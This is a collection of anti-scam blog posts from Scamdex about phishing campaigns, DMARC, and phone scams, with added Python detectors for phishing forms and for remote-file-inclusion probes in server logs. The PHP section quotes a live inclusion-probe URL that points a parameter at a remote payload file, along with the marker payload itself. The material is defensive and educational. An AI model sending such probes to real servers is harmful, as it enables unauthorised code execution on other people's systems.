Phishing

Scamdex Data used in Research – if only they’d asked!

So a routine search turned up a little Research Paper from the University of Nebraska in Omaha.

Trends in Phishing Attacks: Suggestions for Future Research (2011) | Ryan M. Schuetzler | University of Nebraska at Omaha, rschuetzler@unomaha.edu

While I’m flattered by being used as a creditable source, I am upset that they:

  1. Used the Scamdex Email Archive without permission.
  2. Did not contact Scamdex to get permission.
  3. Used ‘Screen Scraping’ tools to (in their words)

    …To obtain a corpus of phishing emails, we scraped 2709 emails from Scamdex.com (“Email Scam, Internet Fraud, IdentityTheft & Phishing Resource,” n.d.). This corpus contained emails over a 3-year period from November 2006 to June 2009. These emails were submitted to Scamdex by recipients of phishing attacks.

  4. Did not credit Scamdex in their references.

The legality of screen-scraping, a term used for software tools that extensively mine or extract information or the complete contents of a website, is debatable. Generally speaking, if commercial use is made of the result then it gets a bit tricky, but for research purposes a lot more latitude is generally given. The Electronic Frontier Foundation has a good one-pager on Fair Use.

If asked, Scamdex would have been completely happy to collaborate. We do ask (nicely) that …

“Any derived content from the Scamdex.com website must clearly show attribution to Scamdex.com as the source and must include a link to the original information”. – http://www.scamdex.com/About-Scamdex.php#use

Scamdex is happy to be used as a research tool, but in future – ask first, then make sure it is credited – is that too much to ask for?

Scam Of The Week: FTC Refund Phishing Phraud

Warn your employees, friends and family
Hi,

There is a new Scam Of The Week where bad guys are trying to trick people into clicking on phishing links to receive an FTC refund, with the twist that the refund is actually real.

The FTC first took action against J. K. Publications, Inc in 1998. These scammers purchased access to the credit card account numbers of more than three million Visa and MasterCard holders from a California bank with the pretext to confirm that the customers had valid credit cards and debit cards.

However, back at the ranch, they made illegal charges on the cards for X-rated Websites. Quite a few of the people who had been fraudulently charged didn’t even own a PC at that time!

The FTC was able to quickly shut down the scam, but J.K. Publications and the people involved in the scam managed to hide millions of the fraudulently obtained dollars in off-shore banks. It took the FTC a very long time to get the money back but they are at the moment mailing 322,000 checks to victims of this scam.

So, lazy bad guys just go to the FTC website to get ideas for phishing attacks and start sending them to millions of people. I suggest you send the following to your employees, friends and family:

There is a new Scam Of The Week where bad guys have taken an actual past scam that the Federal Trade Commission has resolved and is now refunding money on. Bad guys take these FTC cases and create a phishing attack out of them.

Here is the rule: If you receive any emails from an official-sounding organization that promises you a refund for any amount, be very careful and never click on any links or open any attachment you did not ask for. Delete the email. (OPTIONAL: or use the KnowBe4 Phish Alert Button)

https://info.knowbe4.com/free-phish-alert

CyberHeist News

Just how valuable is a Hacked PC?

The massively informative “Krebs on Security” Blog published this graphic which is a startling depiction of just how valuable a compromised PC can be to cyber criminals.

Often the owner of such a PC does not even know that this has happened, and there are millions that have. Check your own PC regularly for oddities and update your malware/virus/firewall software to prevent your own machines becoming a tool of scammers.

From Krebs on Security blog, a graphic showing the value to hackers, scammers and cyber criminals of a compromised (Hacked) PC.

Big Internet (Facebook, Google) gets serious about Email Scams.

And this time, they seem to be serious, joining together these powerhouses:

* Big Internet: Google, Facebook, Microsoft, Yahoo, AOL, LinkedIn etc.

* Big Money (aka financial service providers): Bank of America, Fidelity Investments and PayPal.

* Big Security: Agari, Cloudmark, eCert, Return Path and the Trusted Domain Project

Together they aim to fight Email Scams, specifically Phishing Scams. Such scams try to trick people into giving away passwords and other personal information by sending emails that look as if they come from a legitimate bank, retailer or other business. When Bank of America customers see emails that appear to come from the bank, they might click on a link that takes them to a fake site mimicking the real Bank of America’s. There, they might enter personal details, which scam artists can capture and use for fraud.

To combat that, 15 major technology and financial companies have formed an organisation to design a system for authenticating emails from legitimate senders and weeding out fakes. The new system is called DMARC – short for Domain-based Message Authentication, Reporting and Conformance. In a nutshell, it is another way (in addition to the SPF and DKIM checking already available) to make sure that an email is really from the organization that it says it is.

Most Phishing emails pretend to come from a respected institution and it is a simple matter to claim that the message came from the domain name of the trusted entity. This is the first step in establishing trust – if an email arrives that seems to come from ‘accounts@paypal.com’, one’s guard is just that little bit lower.

DMARC aims to prevent those emails from ever arriving by intelligent checking and has a feedback mechanism that alerts the real organization that the event has occurred.

It’s not going to stop email from addresses that use obfuscated (accounts@paypal.com.asjdgh.gyutut.com) or maliciously mis-spelled (accounts@paypai.com) or just completely fake email addresses (accounts@paypalbillingsupport.com)
…but it’s a start and Scamdex for one applauds it!

More information [than anyone probably needs to know] is available at the DMARC website
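To make the distinction above concrete, here is an added Python example (not code from the post, DMARC.org or any of the companies named) that evaluates a message the way a DMARC-aware receiver would: it looks up the policy for the visible From: domain, checks whether the SPF or DKIM result is aligned with that domain, and returns the disposition. The DMARC records, the domain names and the authentication results are all constructed; the organizational-domain reduction is a two-label simplification rather than the Public Suffix List. The last three cases are the obfuscated, mis-spelled and made-up addresses from the paragraph above, and they come back with no policy at all, which is exactly why DMARC cannot stop them.

```python
from typing import Optional, Tuple

# Constructed DMARC records for the example: in practice these are fetched as TXT
# records at _dmarc.<domain>; no DNS lookup is done here (assumption).
DMARC_RECORDS = {
    "paypal.com": "v=DMARC1; p=reject; adkim=s; aspf=s; rua=mailto:dmarc@reports.example.invalid",
    "bankofamerica.com": "v=DMARC1; p=quarantine; sp=reject",
}


def parse_dmarc(record: str) -> dict:
    """Split a 'tag=value; tag=value' DMARC record into a dict of lowercase tags."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def org_domain(domain: str) -> str:
    """Crude organizational domain: the last two labels.
    Real receivers consult the Public Suffix List; two labels are enough
    for the .com examples used here (assumption)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: Optional[str], mode: str) -> bool:
    """DMARC identifier alignment: strict ('s') needs an exact match,
    relaxed ('r') only needs the same organizational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate(from_addr: str, spf_domain: Optional[str], spf_pass: bool,
             dkim_domain: Optional[str], dkim_pass: bool) -> Tuple[str, str]:
    """Return (disposition, reason) for one message.

    spf_domain is the MAIL FROM domain SPF was checked against; dkim_domain is
    the d= of a DKIM signature.  The From: header domain is what the user sees,
    and DMARC insists it must align with one of those authenticated domains.
    """
    from_domain = from_addr.rsplit("@", 1)[1].lower()
    record = DMARC_RECORDS.get(from_domain)
    subdomain_lookup = False
    if record is None:
        record = DMARC_RECORDS.get(org_domain(from_domain))
        subdomain_lookup = record is not None
    if record is None:
        return "none", f"no DMARC policy published for {from_domain}"

    tags = parse_dmarc(record)
    # Subdomains use 'sp' when the org-domain record publishes it, else 'p'.
    if subdomain_lookup:
        policy = tags.get("sp", tags.get("p", "none"))
    else:
        policy = tags.get("p", "none")
    spf_ok = spf_pass and aligned(from_domain, spf_domain, tags.get("aspf", "r"))
    dkim_ok = dkim_pass and aligned(from_domain, dkim_domain, tags.get("adkim", "r"))
    if spf_ok or dkim_ok:
        return "pass", "aligned " + ("SPF" if spf_ok else "DKIM") + " result"
    return policy, "no aligned SPF or DKIM result"


if __name__ == "__main__":
    cases = [
        # genuine mail: everything lines up with paypal.com
        ("accounts@paypal.com", "paypal.com", True, "paypal.com", True),
        # forged From: header sent through the forger's own (constructed) mail domain
        ("accounts@paypal.com", "mailer.example", True, "mailer.example", True),
        # the three address styles the post says DMARC does not touch
        ("accounts@paypal.com.asjdgh.gyutut.com", "gyutut.com", True, None, False),
        ("accounts@paypai.com", "paypai.com", True, None, False),
        ("accounts@paypalbillingsupport.com", "paypalbillingsupport.com", True, None, False),
    ]
    for case in cases:
        print(case[0], "->", evaluate(*case))
```

The forged paypal.com message fails because neither authenticated domain aligns with the From: domain, so the published p=reject applies. The look-alike domains pass straight through with "none" because the attacker controls those domains and nobody has published a policy for them; the only defence there is the reader's eye, as the post says.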

Phishing Scam of the Day (PenFed)

I received an email today with the promise of a $50 credit to my Pentagon Federal Credit Union (PenFed) account if I completed a customer service survey. The “survey” was sent as an attached HTML (web page) file, which, when completed, went to the homepage of PenFed.

Apart from the simple questions, the final part of the form asked for the online account username and password and also the PIN for the bank. If anyone did fill in this form, they will have handed over the keys to their bank account and should expect it to be emptied pretty quickly.

This is a common enough scam, but stands out for the clever use of bait ($50) and the simple but plausible task required to receive the bait. Enough to blind the recipient to the dangers.

What actually happens when you click ‘Continue’ in the form is that the details you entered are sent to a Texas-based Comcast computer, IP address 98.195.57.33 (information on this IP from DomainWhitePages), and you are then immediately redirected to the PenFed website, where the user will feel comforted by the secure website URL (https://www.penfed.org/).

The only real mistake this scam makes is to use untargeted spam to deliver the message. Non-PenFed members are unlikely to click through and the chances are that websites such as Scamdex.com will pick it up and close the operation down. As of this post, the server is still up and running…
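The tell-tale in this scam is structural: an HTML attachment whose form collects a username, password and PIN but posts them to a bare IP address rather than to the bank. That shape can be checked mechanically before a user ever opens the file. The following Python example is added here and is not Scamdex's or PenFed's code; it parses the forms in an attachment and flags any that ask for credential-like fields while posting to an IP address or to a host outside the brand's own domains. The attachment skeleton below is constructed to mimic the survey described above, and 192.0.2.10 is a documentation address, not the IP from the post.

```python
"""Flag HTML email attachments whose forms collect credentials for an off-brand host."""
from html.parser import HTMLParser
from urllib.parse import urlsplit
import ipaddress

# Substrings that mark a field as credential-like; crude on purpose (for instance
# 'pin' also hits 'shipping'), so tune the list for your own mail flow (assumption).
CREDENTIAL_HINTS = ("user", "login", "pass", "pin", "card", "ssn", "account")


class FormCollector(HTMLParser):
    """Collect every <form> with its action and the name/type of its <input>s."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            name = (attrs.get("name") or "").lower()
            typ = (attrs.get("type") or "text").lower()
            self._current["inputs"].append((name, typ))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_credential_field(name, typ):
    return typ == "password" or any(hint in name for hint in CREDENTIAL_HINTS)


def host_is_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def analyze_attachment(html, expected_domains):
    """Return one finding per form that asks for credentials but posts them
    somewhere other than the brand's own domains (or to a bare IP address)."""
    collector = FormCollector()
    collector.feed(html)
    findings = []
    for form in collector.forms:
        host = (urlsplit(form["action"]).hostname or "").lower()
        fields = [name for name, typ in form["inputs"] if is_credential_field(name, typ)]
        if not fields:
            continue
        on_brand = any(host == d or host.endswith("." + d) for d in expected_domains)
        # An empty host means a relative action, which in a file opened from an
        # attachment has no legitimate destination either, so it is flagged too.
        if host_is_ip(host) or not on_brand:
            findings.append({"action": form["action"], "host": host, "fields": fields,
                             "reason": "bare IP" if host_is_ip(host) else "off-brand host"})
    return findings


# Constructed attachment skeleton in the shape of the survey the post describes.
SAMPLE_ATTACHMENT = """<html><body>
<form method="post" action="http://192.0.2.10/survey.php">
  <p>How satisfied are you? <input type="radio" name="q1" value="5"></p>
  <p>Username <input type="text" name="username"></p>
  <p>Password <input type="password" name="password"></p>
  <p>PIN <input type="text" name="pin"></p>
  <input type="submit" value="Continue">
</form>
<form method="get" action="https://www.penfed.org/search">
  <input type="text" name="q">
</form>
</body></html>"""

if __name__ == "__main__":
    for finding in analyze_attachment(SAMPLE_ATTACHMENT, {"penfed.org"}):
        print(finding)
```

The expected-domain set is the only brand knowledge the check needs; a mail gateway would derive it from the sender the message claims to be. The redirect to the genuine site that follows the submission is invisible to this check and irrelevant to it: the credentials have already left by then.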

Facebook Phishing Attempts and How To Spot Them

Facebook users often use the email notification service to inform them of events on the site, whether it’s a new friend request, a reply to a comment or a photo tag. The notifications always have a handy button to get to the exact point in the site of interest. The problem is trying to work out whether to trust the links.

Facebook doesn’t exactly help its users to feel comfortable – it uses long complex strings in its URLs, odd domain names and a range of different email formats and senders. If it just sent a link to the item (e.g. http://facebook.com?id=987112) then we could be sure we’re not going to suddenly become friends with a scammer or perform some other action.

Ed Bott over at ZDNet has compiled a set of real and fake Facebook notifications and invites you to try to see which is which. The fact that this is so difficult is a perfect illustration of the problem.
The simple answer is to never click on links purporting to come from Facebook unless they have some obviously personalized information that you recognize (and perhaps not even then). Scam/Spammers don’t often have the time or skills to hand-craft each email so they will be very generic.

Best practice to avoid phishing attempts is to NEVER click on any links received by email. Always type in the URL yourself or use a bookmark then you won’t get any nasty shocks!

Read Ed Bott’s article in full Here

Another good tip is to keep your computer updated with good security software, so that your data is less likely to be phished or hit by other attacks. That is much less likely to happen if you have a good security program installed.

Golden 1 Phone Scam hits Sacramento

Social engineering is an approach used to gain unauthorized access to or acquisition of information assets. This approach relies on misrepresentation and the trusting nature of individuals, and is often carried out through the use of phishing telephone calls or email.
A phishing telephone call or phishing email may sound or look as though it comes from an organization you do business with, such as a bank or government entity, but they are generally from a scammer trying to obtain your personal information under false pretenses.

This particular scam is being carried out by telephone as follows:

An individual leaves a message on an employee’s work phone number, stating they are with the Golden 1 Credit Union. In this scam, the message states that the targeted person’s credit and/or debit card has been temporarily suspended and instructs them to push “1” to reach security. Do not push “1”. If you push “1”, a second recording will ask you to put in your card number. DO NOT PUT IN YOUR CARD NUMBER!!!!

The following are general practices to avoid becoming a victim of these types of scams:

• Do not respond to unsolicited (spam) e-mail. Simply delete it.
• Be skeptical of individuals representing themselves as officials soliciting personal information via e-mail, telephone or other means.
• Do not click on links contained within an unsolicited e-mail.
• Be cautious of e-mail claiming to contain pictures in attached files, as the files may contain viruses. Only open attachments from known senders.
• Validate the legitimacy of the organization by directly accessing the organization’s website rather than following an alleged link to the site.
• Do not provide personal or financial information to anyone who solicits information.

The Golden 1 Credit Union has been made aware of this scam. Additional information from Golden 1 Credit Union regarding fraud is available on their website at: https://www.golden1.com/privacysecurity/phonefraud.aspx

PHP Exploit URL foxes Apache

There are a lot of smart people out there who know way too much about computers and software and stuff, like this guy: ‘Perishable Press’. So, can someone clever please tell me why this simple URL hangs up a bunch of seemingly dissimilar web servers:

http://www.microsoft.com/errors.php?error=http://abirdseyeviewof.com/files/image/id1.txt?

My banana was once part of a bunch very similar to this one

Here’s the deal – when someone asks for a webpage on Scamdex that doesn’t exist, it shoots me a quick email to tell me about it. That way I can see if anything is broken and if anyone is trying to hack my site. My normal response to obvious hack attempts is to block the IP address or use .htaccess rewrite rules to send them to an oh-so-friendly ‘go away page’ :).

In this case, the URL carries a payload that is itself a link to a file on a remote site, which it hopes I will allow to run on my server. The code (which is reproduced in its entirety here) will, if allowed to run, return the word ‘FeelCoMz’ to the ‘sKriptKiDee’, aka ‘Wanker’, on the sending end.

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

So… it didn’t work, I trapped it and it raised a red flag, but then why, when I try the URL, does it make a browser stand blinking like a deer in the proverbial headlights for 120 seconds before falling flat on its back?

Analyzing the URL gets me to this reduction of required parts:

* any .php file path;
* any query string that contains ‘http://’;
* the remote name must have a file extension such as txt, gif, png etc.;
* there must be a trailing ‘?’.

Any URL with those parts will cause the same problem on an awful lot of famous-name servers, including mine: scamdex.com, uniplex.com, google.com, microsoft.com, amazon.com etc. etc.

For example, in the following link, everything except ‘www.amazon.com’ is made up

http://www.amazon.com/a.php?b=http://c.gif?

but it still exhibits the same behaviour – WTF is going on?

and why, oh why can’t I detect it in my .htaccess file?

First person to:
1. Tell me why it’s happening.
2. Tell me how to detect it and stop it happening.
3. Tell me why Google hates me.

gets a really major serious prize like my personal desktop banana, or this lovely (chipped) coffee mug with the name of a football club I don’t support on it – or even my second best earphones.

Good luck!

_________________________________

Still no replies and it’s still happening… where have all the gurus gone?
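The post asks two things: why the URL stalls the server, and how to detect it. This added Python example (not the post's own code, and not an answer to the first question) covers only detection: it applies the four criteria listed above to web server access-log lines and tallies the client addresses behind the probes, which is the input for the IP blocking the post already practises. The log lines, the remote host and the client addresses are constructed, and the list of file extensions is an assumption to be widened for real logs.

```python
"""Spot remote-file-inclusion style probes in web server access logs."""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# The four ingredients the post lists: a .php path, a query value that is itself
# an http:// URL, a file extension on that remote name, and a trailing '?'.  The
# trailing '?' is optional here so that probes without it are caught as well
# (a deliberate widening; the extension list is an assumption).
REMOTE_FILE = re.compile(
    r"^https?://[^\s?]+\.(txt|gif|png|jpg|jpeg|php|html?)\??$", re.IGNORECASE)

# Common log format line (constructed regex, sufficient for the sample below).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')


def is_rfi_probe(request_url):
    """True when a request matches the shape of the URLs in the post."""
    parts = urlsplit(request_url)
    if not parts.path.lower().endswith(".php"):
        return False
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_FILE.match(value.strip()):
            return True
    return False


def scan_log(lines):
    """Return (client_ip, url) for every log line that looks like an RFI probe."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_rfi_probe(m.group("url")):
            hits.append((m.group("ip"), m.group("url")))
    return hits


def probe_counts(lines):
    """Client IPs with their probe counts, the raw material for a block list."""
    return Counter(ip for ip, _ in scan_log(lines))


# Constructed log lines: documentation-range client addresses and a made-up
# remote host, in the same spirit as the post's amazon.com example.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2010:13:55:36 -0700] "GET /errors.php?error=http://remote.example/files/id1.txt? HTTP/1.1" 404 512
198.51.100.2 - - [10/Oct/2010:13:55:40 -0700] "GET /index.php?page=about HTTP/1.1" 200 2048
203.0.113.7 - - [10/Oct/2010:13:56:01 -0700] "GET /a.php?b=http://c.gif? HTTP/1.1" 404 512
198.51.100.9 - - [10/Oct/2010:13:57:12 -0700] "GET /go.html?u=http://remote.example/x.txt? HTTP/1.1" 404 512
""".splitlines()

if __name__ == "__main__":
    for ip, url in scan_log(SAMPLE_LOG):
        print(ip, url)
    print(probe_counts(SAMPLE_LOG))
```

The same predicate expressed for Apache's mod_rewrite is a condition on the query string, `RewriteCond %{QUERY_STRING} (^|&)[^&=]*=https?:// [NC]` followed by `RewriteRule ^ - [F]`, which refuses any request whose query carries a parameter value beginning with a URL. Whether such a rule is reached before whatever causes the 120-second stall the post describes is a separate question that this example does not settle.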